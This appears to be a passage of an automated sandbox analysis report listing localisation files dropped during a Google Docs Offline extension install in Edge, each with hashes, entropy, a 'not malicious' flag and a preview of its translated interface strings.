SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
